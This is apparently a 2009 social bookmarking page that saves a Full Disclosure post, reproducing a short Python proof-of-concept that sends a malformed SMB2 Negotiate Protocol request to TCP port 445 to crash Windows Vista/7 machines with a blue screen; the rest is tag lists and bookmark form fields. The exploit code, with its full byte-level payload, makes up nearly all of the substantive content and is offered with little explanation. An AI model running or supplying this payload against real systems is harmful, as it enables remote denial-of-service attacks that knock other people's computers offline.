gregp01 + python   8

Full Disclosure: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
Smb-Bsod.py:
#!/usr/bin/python
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"

)
s = socket()

s.connect(host)
s.send(buff)
s.close()
windows  vista  smb  samba  remote  bsod  crash  vulnerability  exploit  python  proof  concept  code  todo 
september 2009 by gregp01

related tags

animation  api  array  arrays  automate  automation  awaymsgused  awesome  book  brief  bsod  code  compare  comparison  concept  cool  cosmology  crash  data  diy  droopy  earth  eels  end  ending  engineered  engineering  everything  evolution  exploit  file  files  flip  flipbook  foot  full  graphical  graphics  gui  hack  hardware  history  hovercraft  howto  html  humans  image  interface  is  language  languages  launch  launcher  library  many  math  matrices  matrix  mine  mining  missile  monty  much  multiple  my  number  numbers  numerical  of  one  page  people  php  pretty  process  processing  program  programming  project  proof  python  reference  remote  reverse  ruby  samba  science  scientific  scrape  scraper  scraping  screen  screenshot  screenshots  script  scripting  send  several  shot  shots  site  sites  smb  software  thing  todo  tools  toy  transfer  universe  usb  user  utility  varied  variety  various  video  vista  visual  vulnerability  war  web  well  wiki  windows  world 

Copy this bookmark:



description:


tags: